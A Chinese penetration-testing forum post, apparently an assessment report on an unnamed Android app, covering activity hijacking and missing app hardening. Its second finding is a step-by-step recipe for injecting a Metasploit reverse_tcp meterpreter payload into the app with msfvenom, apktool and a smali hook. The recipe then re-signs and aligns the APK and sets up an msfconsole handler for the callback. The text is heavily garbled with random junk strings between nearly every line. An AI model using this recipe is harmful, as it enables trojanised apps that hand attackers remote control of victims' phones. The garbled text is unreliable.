/ L1 N$ c# K# T: V+ a: |* ]0 m" K0 {1 ?) ]8 k, M

- o; I6 A! a9 {' x1 x + v- @8 |9 f K5 k   . ^7 I$ _; v- X$ U6 J: y 8 L! E6 p2 E4 A0 E. P9 t' v' E

" @' w, L8 Z6 ^4 X$ I 0 O. x' |( t2 h1 O& S

2 s5 m( z# X! y- ]! L! m X0 d . E6 c* c( ^% k6 [" x6 {, R 2 检测结果                    5 r8 V! }% p4 K' O7 z ~; A; Z2 T0 N+ K4 Q+ ?

! q- z! i( ?% Y( y & X- ?7 n. d7 V) Q9 K& @; b

1 A4 M+ _' g- G$ E # `+ d" I0 z( m7 z0 `2 m 2.1 某某某 + \% i' C, n X# e : E( u' K$ t \: E

. g+ V6 g1 `0 k4 u1 ^2 q- r & c& J8 }0 y8 k) p, h3 b* S; k' a' q# }

" e! e; _8 y, N" n2 T7 N6 N7 b# S 3 Y- A* x2 Z4 Z X5 [1 U/ `& v5 N 2.1.1检测目标 ) b/ G1 ?" a3 x' G9 F6 `% Z) s 2 p. s; X! p: o+ v0 ^5 N* i* ?# `

. Y0 {& t& ?1 F. } ' [; p# s% S* y

. l6 q- t& w' ?; z( R" M : j& y' Y$ C$ Z 目标地址: 某某某某某某APP 9 D0 Z4 V$ w$ x! R: D$ Y$ V * w' @; h+ o& @3 U2 K

5 Z+ U) y8 {# T0 z3 x0 ?: k; x " i2 U Y. R; _

! Q: \0 S' S0 m% M+ X ( u* m! C0 M d" {& W4 A/ R 2.1.2检测结果 : [& m& B4 G. j" u* Y/ ]: y& z & \- y1 A- L3 q/ K0 \+ v

: s) Q' u% O5 m& A% ? w K9 H6 N+ Q G0 A. v% m$ ~$ H

6 _4 P# j3 P* W+ X* w / [2 j3 s; J! T2 x* H, |0 B$ w 2.1.2.1 7 U7 e* B8 g. j1 i$ p6 e 5 k$ q0 {# z- z9 q/ ~/ y

. g0 P2 x% k" z: t, u- |' {) h. K 1 E9 u2 a1 J5 |

# r7 t3 @9 I5 b' f+ O x 7 Z4 g6 d1 M7 M9 r9 E+ w 漏洞链接地址:某某某某某某APP / c* f- X, B* Y( k, }, ^6 y / A% F, P- @! f% }# _; X4 J

4 p7 Y. f* U/ p6 H8 L' B) A * f5 {, x* ?0 g5 e( ?2 L% V) d! p

/ \# Q7 \* g+ e + ` M* g4 q7 B   ; ~8 Z2 h( b) w" s" c. H' U6 U f e" \) e- R# i8 O4 e# h

* K6 b7 z6 J& y1 y) i 5 Q; N" Z/ I* O

0 o6 ~- F! ~$ j1 J$ G4 l 8 P( D# N2 [# j5 p) ` 漏洞分析及取证: " \$ z5 n: u$ i3 i- W% }. p6 S, x0 M3 ^/ d% O4 Q$ ^

4 b- N+ V8 c2 y ( q8 r7 z4 t: G

/ _ t. j, Q: i6 q & q2 {* _ ]9 l# x                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: % ^$ ~' k( A4 @. f0 T8 \ * d. f# a( C4 A( J, f+ `

# q4 c# c+ f) s; J * e1 O0 D; a" L0 L+ O+ ^

! B) C% @9 f5 y2 U, V$ P ( G. S% v: E. t/ y      1 T( W2 B2 q. e) L , Z/ ~8 p8 H; o N2 p8 E9 }

3 H/ a) j8 ]. D. ?9 X2 j$ p( t) S; d5 M! y

% f% i/ z. ?# D8 h) O6 L0 b" q * \0 j5 S8 y8 q& @3 A                       % K# j' [9 ?; V: D4 ^& U' f9 B$ O6 _9 G( u

+ m2 L8 m0 [+ T) P & A0 M- \. X) R" u. n

/ W& D0 z7 X; i3 y' W. Q8 c! P6 ~& h8 } ' V% G: ?6 [5 v$ g: I9 m$ H / l. h7 a9 d! }

6 S B8 y1 Z1 [ z * o9 M7 \- d) Y9 a6 R# O$ z

, ]5 q: G9 }) S5 ]4 G" f 4 e, L) e# V" ` 9 m3 |7 ? |4 C; a- s8 h/ z * {6 o- y# Y9 H1 N+ u& ?

9 V" n2 Q M, Q8 k% L+ G6 b. `2 {! l4 }4 @ ~

) X S6 j4 g, A7 k7 Z1 U + n. F1 ^+ J$ K$ g; b" h ! `% ]' Q0 Y1 j- T a0 P& d3 r% o- ^ b0 P

( T7 Q7 ~7 D/ O; ~ , X9 [5 `( D. N }

% s9 r( }2 _8 E- ?7 I) {1 s / x' E1 o# X: z: Y$ c 漏洞危害:高 . s, A& N8 c9 e; ~" L C H! l3 j" Q9 D9 t7 @) f

\& Z6 }& i- S9 p+ c1 E6 N : Y9 l5 ?! @: F1 K4 v& y
1 _! f1 q1 P' s' t9 A4 _ $ t& z+ C& b2 {1 ^- p, x5 O / z/ X c) c7 o$ N; {- I( f5 b! ?9 U/ S1 h* X( r! Y& r) r& h2 y9 r7 D9 Y; K+ w% N7 B+ B! S7 k8 M" S5 d4 o# }' w7 x3 @$ \0 |4 X, ^& ^ s8 j+ T8 j: J2 h: _' `; u8 G, v9 V/ j U2 J3 A1 B3 N2 ~3 }# M, B3 Q$ m2 Y( d! ~ `0 q' ~5 |8 P$ r1 A9 r; V, M9 \ _6 `4 I; a1 T7 v7 _9 A/ Y2 J' O. B4 Y/ g* ^6 A1 p! e" w/ ]. ?" P% i6 H; x; E4 |; @8 l) c# \8 o* h: U0 N) k# T4 j8 z, P/ q9 w* N4 |- [) I/ {/ |) f- w* g, ~: H2 g1 _( c6 O& p2 ]* t: j8 M2 {& _; x/ Z5 p' i3 F% n& H3 e }7 p3 F- d) }0 g) w# ], d$ G1 E7 G1 D ^$ |# n3 k$ z# |+ y" {( K4 F7 M
/ L% W* D' B( l1 W4 ? + o' h9 \9 \# K1 |

3 |! V- E) l9 ~ - Q; Q9 {7 q3 Z& c5 `. x! l 严重程度 0 Q4 c1 F: @: m5 @% H7 p 8 V3 s; h$ L8 m+ V6 n

2 s- G* N9 n. c8 D/ K" B" o* f4 X ' C. \8 b# Y8 Y, E
1 @9 O4 n3 O: C( |- t7 I 9 N; k9 }6 D0 `! \* p% t( ^& G- ~

$ U1 D! q3 s, a7 v' V5 Q S9 e0 p5 |' }8 ^4 q1 e" O # u* W. [7 w9 Y$ f * R1 R! H. m _* O5 q% @

9 N* |6 G4 A n) K A( \4 H" x! S6 e % h1 h, ]$ E) E9 O/ s
5 x, I9 d$ N! O: U; n3 r* ~4 T1 B& D+ O + _; l3 q+ N1 D3 h, W. o

|/ c2 e. [: \ 6 I* p0 t) x3 M z4 f1 f0 m / x1 d/ o8 O: \) h0 R) R ) _7 x7 @/ f+ u

j; S: }$ Y: B; `- X+ s+ u- a6 m |! Z; j# i4 ?2 x3 t
( }6 A* B/ A8 B+ o6 e8 V9 e8 ? " ^% t: M! o$ ]6 d) d0 q

. d- Y, m, {; a! i+ q( z* J 4 e5 A. T* R& A$ k& }2 _# x % q3 H U: c9 O, _7 R. @ & W. n( l+ e0 G

6 u( |- s/ ^# V1 n8 E1 N* ]$ i$ V- \) s) p( F% f1 ^8 z; F* s' q z
x- E' o) ~' b# K2 ^# L! }5 E% R4 R $ Y& G0 m" L2 Z" e

3 ~7 U" t8 m2 E; ?# C+ O' V% Z a. B2 }0 r ]   5 l9 @3 i3 ]4 Y% t0 h + y9 h' p7 p. d |6 h! s2 J) R

/ \1 S3 e2 V( w5 ~ 0 g7 u" l, E/ D
& w6 B- U4 o4 B- g1 ^9 P& n; X1 e9 _6 y9 z [, Z

& U3 z% }: n2 L" r/ z$ l9 T : Y+ m" C/ `- A7 J% r5 F & H, m4 r/ L9 E9 j4 P( C9 p! w2 ?+ E9 ^* U2 y# ~

6 x, h$ \* r5 f/ z/ `: D ( {$ b5 C6 U" x$ H
! f3 u$ h' Z# x+ V9 T' y; O1 W! V 3 k# A9 b* U i9 g8 _5 F' i: m/ _

5 Q1 Z+ `8 {; B7 f' G Q/ L0 q) _ 0 U; }! O7 G" p& n4 @8 U5 y   ' e! U4 ?0 F2 z' y, ]1 ^ n+ ^ # l1 @" k! M9 V4 F( J/ E

- J2 s, R; E0 ^3 A8 L0 O# f3 a " N# e5 u' S* K/ x' |
9 p4 y% e1 @8 ]0 e8 `( ~ , ~% v8 a% q0 S3 j
. s% v# L+ q( {, w/ a V8 x " p+ C* O) Z, w' C% h

- R3 n" ~8 T. [# a S" Y1 r1 }1 t   ! ]7 ^( r0 V. `. u2 d 6 k% f6 G) f8 O

/ F9 H6 z" L/ k+ n( v9 K8 p6 w2 [) ~: j1 E# g

- A4 q" C) Q8 ~/ Q; v8 A' V r" ]% N# u! D/ d# F 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' }& b% ]5 B2 ]2 k _( _7 Y3 ?8 y. j' S1 C$ B8 o7 ^; z. j

5 Q5 c* ^$ Y( z* b4 c& R& ?, ]$ Q4 h5 y( O: t! Y

+ D) X6 c7 I4 ^1 K& \, C - |7 x& K+ n9 k% A! x           5 H- G( t% K. O7 i) ^5 b 8 @5 M" m4 v% w) Q, i

# k- t& Z' c9 f" J3 N5 e . w! z& [1 M \

" d4 u; F& s, K8 i ; E* B6 y8 l, f7 g" F   $ L+ ?2 B( G' f7 f 4 U' s% e* A# z* d' r$ \

5 g. L' T2 ]; ] 4 ~# r) c- ]8 ?5 W2 ~! l* N; z8 L

" {. F4 C. K5 `/ K% }, ?8 \( ^6 T2 t 6 m7 i7 s* l' h# z 2.1.2.2 ' W" S; j: b. w6 D) F: y7 q5 L' ^( x/ y

& p/ v6 f$ T' ?0 G7 i7 n6 W3 Q! L, A

; R4 G. ~0 `! R" ~ ( o! C/ f# @# u' O% R 漏洞链接地址:某某某某某某APP ! h% U1 f3 O) B E * l' T2 T( z1 P

* ?7 Q& l1 W+ F+ r3 |" ~5 y% I* P % D' Z# _" I0 A& x: q

8 X% e- O/ {. | + |* s8 e+ q, M& V 漏洞分析及取证: * v) p+ H# b& E+ s* t, m. y! z. K& |8 R& {& m

) d8 h4 s. T8 e9 L: M 8 o$ P- L: y( w6 Y# c" L# G* O1 k

$ k: o4 i9 \5 h& f/ l( S 1 u! ]4 M" S2 d* t% ]                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 7 a% L+ f3 d( K% [2 h* O8 `) D# S6 X7 M# B7 _% H7 L5 N2 S4 r

* L" h0 R4 |& v4 m # m( @( \, f+ e1 c! l8 x

. X( [. w2 W- M% i4 j / o# H/ e( ^: U+ s; ]: C Metasploit 生成木马 apk & l/ M9 ]1 P2 e 9 R. _" v' H( Z

, A& E6 h- {: q {# y 2 B( ~6 f) I- X P- @! f% C

6 H2 s# F4 \; |6 A 6 c% n% v# V- d) Y msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk % J& @/ g# S3 ]$ b7 U; H # F# W) B/ A1 B, m" X

2 q5 z4 E' [( r6 e . C5 D# d% _. b, L

7 d z) B+ @8 a* ^; j! |# y4 p+ t+ p9 | 反编译目标apk和木马apk 3 s" {1 I* m" J2 S 0 } ~; |1 u6 l3 r3 D" k

: \; u4 f0 J3 x6 n1 \: ~& D( n* |8 @( r& |# K

' H. \# H2 [3 C; k" q8 | 7 S5 [( ~& k/ D( ~7 J u apktool d target.apk
6 h9 u" \' W4 m. c3 j 1 ? u7 P! I) P1 {# W apktool d cockhorse.apk
# w1 s3 k2 g: f, x 9 b# G: m0 |; ?( q6 t

6 i, V# D) z$ `% M9 } 1 r& M- h& W3 V

3 o% `- y4 b6 d / y( Q* I6 x+ Y 木马 apk 注入目标 apk / U0 T9 r6 n8 J ' Z( G0 h0 n; b2 Y$ e" N/ O

2 `+ C( ~$ {% T$ ?/ S" q+ d & P0 m& X* `/ u

3 m+ X8 ] A8 K9 h , |5 p4 W) g; Y, Y: P O 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
1 d) o9 m' N6 ~2 x4 _ $ G% v" R; d' B( e! b% W: W; r invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
/ @9 b& B0 R5 c' a+ e U4 Y+ R+ v

) a$ S' M& _# A; ]2 [% O) y ]! I# _/ U1 x$ c

8 c7 P4 b' Z$ F+ w, N! A! X) ^ 8 ?6 h/ \4 _3 {1 S1 _7 N* v 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 8 N$ o. L. {2 n: J( J / d1 J; d; e* h1 K$ r1 n

$ O, s. l3 ]2 k* a. }4 r 0 o* Y; n g) U' C

+ T6 p+ g" Y. B5 i+ Z7 z4 H/ \1 ^) C7 Y2 @1 K( } 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ & R7 R1 S4 K* c0 n2 f " L$ x6 c) i0 _4 X# y0 ?- S0 H" e2 O

5 a5 [7 z; @; ]5 V2 Q$ ] 9 ~8 w% L6 S# U& E; c; d

/ w( f' {: R9 t4 O3 Z$ P. Z2 p$ K: r0 I0 [6 H 回编译生成最终 apk ! S, h: u% i" e- Y& ~4 n 3 C( Z, `& i) I" K6 D" M% h

7 G" ^, t9 V+ U) M1 b2 J# x0 h4 q5 C( v5 k# T; W

R! |# d1 _% e! V 7 e0 A, w$ H: p) B 重新打包 % O4 P6 Z' {6 T k- O- b f" e( A) f; t$ Q2 I* i* D

- a* G) u5 A/ d2 H- o/ [$ S- P0 l( H) M+ W! F; I

; T; U8 f4 _' I8 k 0 f6 q' A* U# I' K- x2 C2 a4 p apktool b -o repackage.apk target_app_floder * ^( X8 \" t4 |; ?* U3 x) B7 Z* Y0 ]8 C H ; \, U* x( P/ |/ M3 U/ Z

c3 k2 Y, ~& g2 [4 Y; g ' t( p2 _: V2 i/ A+ ?

0 s& h5 W; g& B6 C8 A 2 z6 i9 x- \( M* ]- K" {2 y 创建签名文件,有的话可忽略此步骤 + n& w7 F* ^' J/ W( t$ D2 _1 R$ x 0 u8 B" D r* c- Z3 V+ |

3 T' j# z) a- b) m& ] : n8 _) G$ Z6 p+ a+ g1 k

7 K/ T2 @. N m5 E' J, t4 O6 k + z$ S* F5 N( }, M9 } keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                5 O/ K/ _5 W% h, V9 r3 U & g* G% ~* |3 H C# x. F/ f

) [0 _' i7 H: H1 G ( `9 C/ A& j) {; o& }( m, X

" _+ W/ n3 O) {* _, t9 I7 j `& b 6 P ~- \) n% h. T$ Y 签名,以下任选其一 9 h/ c" L7 b3 }! z. J% \& X% M% ~& M

% ]% A$ S q' L& w) b6 q. k% t # w& c* T; E* m1 B# @' q9 H* C7 {7 b3 B

8 m7 C$ O' g9 G) U# j - s S$ \6 P# M8 D2 K jarsigner 方式 ! Y+ _% c- \0 z5 }1 }2 N8 {; l & p9 L! N( L9 d9 I

K% B% d& k c2 t / c; K1 z1 M3 F! v" C% g

7 T4 e5 p# S N0 T) N ; c% b8 b6 K( R2 d( {7 i( W jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname + I& S. I2 a, J. A: v, Z, S4 c: \. R7 G, l# P; v

* v2 h+ o. {9 q $ [' M0 ? X: W

& _' x ` u6 w5 [' [ \1 l" o8 t9 ?* V) \/ Z$ C apksigner 方式 + P# k9 W7 d+ t4 |( ]( B J' l J/ _2 F

2 W( G: X/ ~- f. z , k! d( f+ t+ O/ N

" H `. [. L# H: T. l* } 8 }# Z: l. u: N0 z3 {; `1 q apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk $ V8 J: f0 ]' u4 d5 o7 S $ Z2 `) o. N' E

1 E& h# P ?' y3 K5 a 0 B+ g6 F7 s/ T0 |: }

; N+ y, L/ D: k4 |* g; ? / d* s5 @& ~) R9 k, F7 Q1 }7 h% ? 如需要禁用 v2签名 添加选项--v2-signing-enabled false 6 x! X7 @. ~5 { ' @2 D6 a/ N: `, N2 k! b0 |* |6 U

+ \1 C/ Z2 b% h m; {9 F 7 I9 y4 A& I+ ^& o& o; o

0 p2 ]' n! q9 E$ k" T7 H7 | + W8 b2 n) f6 T% h 验证,以下任选其一 ' c. h- _( s. _ ; K$ R5 `4 S( G( Y" l; I

- n% _5 k3 N' F. a D9 X9 ? 0 K2 V; T* ~# R( \8 s; L

, }& I5 H% e8 e7 i, T ( i) h6 S0 G9 l jarsigner方式 0 E/ f9 G* D8 l* @* t $ d4 A* [* M& W" l* h) v' W

- {5 i! V6 e% ?7 X a2 } % Z, y& Z* n$ ~; `

, f3 I7 t- P1 t+ P. P . \5 O* l2 U: f jarsigner -verify repackaged.apk 7 t4 P% P* N) n6 a- M& q3 e# v u: U. {6 M2 {* M

) R# @3 Y, _& Q + ?; Y+ w4 g% S7 c+ U7 |9 x

2 \' W2 l! {7 A, n# r9 J) J0 X + Y% l5 c# u% O apksigner 方式 - ^3 A }4 G' s2 O1 K9 ?. H0 _6 k! ^+ a! x M0 P0 e$ o: ~5 y7 L0 I

- u1 l- g/ I! Z7 y4 z , F# b; I" x7 g7 s1 R' A6 |

% T2 E! Z0 v( t' ~) @9 N9 F3 d% R$ @. j5 c9 l" `, H apksigner verify -v --print-certs repackaged.apk 1 p: x1 \3 R c( ?, L; T% O $ w3 L+ p4 |7 l# ^( Y

; Y" ?. S+ E7 z9 M& L; h/ g; Q7 R9 {+ I

1 g- F2 M# g' t5 ` " e2 ], `) y; ~+ Z$ o keytool方式 $ E7 k" ?. r4 b! A- p" a% S' {+ n' G2 K7 ~/ g

$ {2 R+ x7 P- h C2 }0 d) h& ~) u: X1 s0 [% c5 z

, m- l' f# _" u4 ]) G/ v \" S - ^0 ?/ _3 F: \- a+ H keytool -printcert -jarfile repackaged.apk 2 ^: b1 T( U$ \: H1 I' U4 u6 t : i4 N3 Y7 W( V9 D

, ]" k2 H$ U, K o }8 H 4 S" ^* L( I/ y+ ^8 t1 @5 X

$ u" R* E4 @4 @7 \ z+ J: V) R! k " Q) M2 m" P! U7 q6 E+ Q3 p 对齐 + T7 f9 K" J! N 3 B/ `( j I+ S3 e: k) C! E A

2 m' _% D" Q& p) I$ y1 I* ] }$ U" D& h A4 E9 t; t9 `+ j

. G- Y; O" }! P% b% u7 H6 H) {2 B( k C' y/ M7 R( O 字节对齐优化 $ `7 O5 m4 S' H9 ^/ o 2 J2 {% f, @% O5 T: k/ K2 q

4 Y, j& |- i o I4 X * p5 A- ]# c5 [# p& Q8 O3 ?4 n

2 a* f E. q9 z5 L8 G$ q! p3 { % s# ~7 Q2 S; X7 S0 i5 g6 \ zipalign -v 4 repackaged.apk final.apk & a, r7 C7 f# Y * V" Y5 v9 o: E* D

2 h9 g" f! K5 z- k4 u! O ) @7 v- R) h1 a% z9 v3 p* f0 x4 X- n

. Y" ]1 B8 N" S& F7 D1 o1 i( n - P' U6 X: O- x 检查是否对齐 " t( o5 ^% s! B$ h, f% q- x7 m' E& J2 ]- d

( K6 p$ [8 K( G4 m6 {5 t. A3 s : R W: I7 d$ c0 }' H* h

4 J$ ?# o/ X' M" R9 A 2 o* M. G7 ?" X zipalign -c -v 4 final.apk ) S: N2 |3 r( E6 @- w" g& x: y, L. x

' B' Q+ j7 m! O . \6 { e* A8 {2 T9 s5 [) I

; D/ c9 f% j$ `) Y$ o2 |$ y9 S: s; B6 W3 a- e! X* a# } 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 $ H e6 C9 j1 N- z" f o8 b 8 L$ T, S0 j/ i* E8 b

& `% B+ G! S) K7 |& I M5 K: n 5 [# w% g5 Z$ s# b

) P% F& E1 V* K! @( L5 C' Q% D% S/ e- f8 {: }) W( G1 [' a 启动Metasploit控制台,配置参数等待上线 , ~8 m+ f9 l# W) j' |6 c 5 I' f: j' r' s" L" F! x p

; x4 x& K2 L4 O" K) N5 h* c0 f 5 V+ r' s: A" t8 T

9 r1 x! m0 Y; d + R$ M( H- }! a1 R6 C3 w 在终端依次输入如下命令 ; G# T6 Q( T* c# C; G. ` }3 j q" S; o% e1 p

& y5 I$ W; L. x! l: `# L # n K! q# `3 j: ]4 v1 b- u: A

8 E( {. T5 J% r$ u3 M+ G# B* H: `! z8 A( A N msfconsole ) J0 O8 f4 f* k# X* ^* `: I2 {) I8 t- ^

- T4 \; M& c7 {) E% i' a% K( i. E; \; V2 H* l# u' ~4 V/ S

% O4 Z1 S, l3 ^. l; i* L* ~) } + l, c# e2 u% U: c use exploit/multi/handler . k; C$ J" b' W( { 3 ]& |+ w# i+ H5 d. `

& ?' E7 M! R4 h! P- [/ H3 K! O1 m

# [ V- r b) }1 ?+ R' e . Y7 k5 m8 Z5 H5 a set PAYLOAD android/meterpreter/reverse_tcp - c2 p: S; S- z2 ]2 | $ V _ m( s/ G, T

% Z3 @+ G( l+ @& o2 h) u " U! q# J* N% D8 ?- t

8 @* J. m4 a2 [; Q' _. a 2 b9 W+ S, n2 v0 U3 o5 e set LHOST 192.xxx.xx.xx 7 `8 G9 C( h* E O3 ~+ B* N4 ~0 C* Z- t0 g; r' ?

# T& ~) i+ X4 I, \9 W" J0 M! a7 @ @( W6 H

+ o1 R4 ]3 {: j B4 C1 X# I) w. ]4 w* j( S set LPORT 4444 9 Q: M' K8 r, I) w: }: v " C4 a6 f: q1 X

# k( ?# z5 w9 H" Z+ r 1 V0 x; C4 k) x! V, l( d

9 m# ~9 `8 K; @5 T0 @/ g ) ~$ y: F/ k+ a exploit 9 \4 t9 P+ t" H0 p9 A- b7 ^ . Q f7 r" H1 i8 j J |2 ]

" t a8 E! y5 T8 e ! x7 o: P( L6 d. @

- m' a8 b7 W% L! ^' Y. D 6 R+ U! p; k" Z% j, k" J5 v" a. O/ S 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               2 K4 t3 Z% K% S5 Y I' r# R ( \& T# R9 [$ G6 |, [$ f1 l5 L

) S6 ], Y5 Z/ o8 M# E) R( a - g) h, H# Q3 j5 Z* h/ u( _: E: m# I

6 a1 B1 X* \: e; h+ @$ ]6 d( G- H% h1 N0 X/ \% a+ z, o$ e 漏洞危害:中 ( g' o9 t% `3 E8 i: U ) ]; v; Z! G" Q, H5 I) m

- b5 B4 X7 [- J 8 i. d: K: [" @% `
, Y" @; D0 F+ [% i4 w" A1 B0 Q5 j Y/ e g / |: f( \! Z W: u( E1 P i - M: l7 u9 S& ?0 M/ B7 ` * n c2 P, x; X X7 f s2 E8 M0 L0 K3 n0 y# V' y9 l0 W* ~# m6 P4 f* V: y! Z' T$ Y; ]! H h" k5 e/ |7 R2 o% R& n% {' z/ M) Y1 n" }- Y& d" j! s1 |/ j) N$ B+ H) ?2 m# T! K) }6 c' j- J) q) H. T: ~/ |7 n) O% ^8 G d# A2 [( f% [0 J& Q; S; q6 w0 O% o1 g( ]+ Q1 Q& t7 ^6 U6 a* Q9 v# L+ N, E/ j- X$ R; C; {% I( q1 R. U, j$ P' s5 t* D$ y8 y+ X4 |- u9 f. g& s) c% ]2 m9 z6 ?( {/ p5 ?6 E& c3 I' ~+ z/ m" I% s- j' `+ N, M5 L: O/ v1 e x6 N1 y$ _5 {; b% Z. U8 H2 M- ?% a/ G2 l, y+ v& y- b* t1 P% X5 W8 v4 B" e3 V% p- }3 v. x& H/ \5 A, v0 u7 Z: r# d1 {$ L3 _- G1 c0 h6 ]8 K; W
' b. k4 x/ s1 l) k8 j7 G1 Y ! T( N2 g+ I; d6 N

0 K9 l& I; E0 L1 f S 4 d, B9 j. Z1 M) M 严重程度 # n3 B' D9 ^( \4 m# Z * y9 T! w/ v5 ~) e

4 h4 b* `8 S) Q1 h. Z* A3 o 6 x8 ?6 @; ?1 k! g
" Y9 o- r; R5 h4 O $ N, f+ h/ A* d" t+ e {

+ o1 h3 }1 L6 A* z: O % x. J* \5 Y# x 2 s/ y1 {9 L) w / X9 o2 ]) {! @- V8 ?5 e

. f6 l: A4 K1 G6 Z) p( v9 I4 q, S8 M2 z: {6 g) B
+ H3 z2 T0 c/ Q( s' V& p3 Y w5 ?! L" k: N! H+ R

& |+ M9 j/ U2 D5 }+ t" a5 b* ? % K4 b: f2 l- W( f 5 k% P) K/ I2 `! G* w- V9 c0 I, e1 |5 o8 N! @; ]

* C; s, A7 O' p2 ^8 }: G+ b J; U9 c# H# E
5 g4 G" z+ _! s: D8 j; g ( I; n. `7 t& P7 t

8 d# _+ M" R* T, y; C0 G" m1 X. B0 m! g8 d G/ l, Z8 I0 x4 Z " R; A/ k% S9 i) T0 h, n& ^8 A3 ` 2 @! V+ ?( U5 Y

0 I& I& s% R/ z" t: @5 V* S' b . \0 @/ c# c1 Y% u+ ^
; ?0 ]- p# N) l- @ 3 L, f: P& h7 O, u( w1 L+ k ) f3 U Y4 ~, G6 D4 G/ C) C; Q9 M& ~- O$ w% j- M/ _# F) t$ r S

) A4 G) {2 e$ z- q7 y1 t. E 1 ` V- h/ X' w6 r' l B   4 G6 `; H+ ~8 n U, \6 _1 c ) }/ k7 I! p2 S& C; q) }

, Y, L/ K, C% Y* u$ z: A( \ ; a/ \0 G* I8 B
; r2 T/ E. w* W( M $ \8 J" L2 P( S* A

$ E2 l3 e2 N7 i& M7 J$ u% w* R! U 5 N- d1 Y9 t2 H% h( r+ i # O7 `; C- \4 c3 `7 ?9 R* Z0 n# [8 c! S9 w9 L8 ~

8 M/ }$ a$ v; a6 S' n+ o6 E) r- o$ |7 e2 H$ e. r/ `% d2 ]# j
y" I* h" a7 j- L' k0 U" ?( r0 g5 W) i2 S ( j/ c8 S* ?* e0 ]- {9 n . }3 @% q, c- R* n

4 M7 o2 G- o; B ' n9 q2 G. H8 [; @   \ H# G. r# A0 W9 b ) W+ r* y) g7 p7 ~% R7 r

% e) G1 b0 x$ N$ c4 G0 k8 h6 I+ l+ ^/ ^0 w
5 y, y/ F& G$ G6 |+ q( ^; t% J/ m
% a8 T4 w% s+ x- U1 {4 ^* q' B5 O. `

5 ]: V6 I. ]( W- }5 b + x( a3 w: U2 I* s   6 N! P: b! {: t& b/ h* m4 f 1 f" _7 L8 B2 B+ @0 O: Y

5 ?) S5 M5 h7 ?/ a # K$ Y G5 n+ d# ?% q

( a6 f" o; f8 Q- |1 Z. K/ j " s, i9 ]1 }) w" [# s; Z2 ?8 o& b 修复方法: / S8 D5 [* C: O3 S- S , ?4 g/ k& y. q/ y" M# r

) x1 }' ]+ [/ e # {0 B/ e D. s0 e% w* F

5 [6 ~* U8 u3 o+ y. u2 C) H+ t( \3 b7 ?' `. D- F               1. APP 启动时应做签名校验防止二次打包。
9 E- T. j; L2 p3 R" B6 n$ F) L : l5 D0 Z4 z0 c# ^& \# i9 T 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ! Q. t* N: |9 t + A- |/ T1 F* B

' ~: e1 K9 ^2 q; B: a5 X: d# G: C 1 @) |/ G" Q2 p# g - x2 e$ r# G: _: A- o" l + p6 H7 d- L4 ^# M- j5 C3 G$ Y

5 O+ ]: H1 ^" w( K3 t ( a8 G2 ~2 J/ @. r8 Q* Q! Y   . c) J% I5 g" L$ L 8 \- z3 w) b. S; ?

4 f7 L; j, c8 d: b1 k- M; G1 {4 z& q' [1 c+ P$ H3 L 3 \0 O1 O: H i. n- b3 L7 d6 Z7 t7 O0 w

' M2 B3 n# h, Q- A0 j # y+ {- @# P1 }1 S7 i: x3 G: \5 s
; w0 Q [. J G- |# G9 o; v- T a$ b0 X9 z9 a: f% @9 V

/ y9 w( h% x/ _' \/ \ 5 v4 e5 f7 d- [; Q1 ?





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2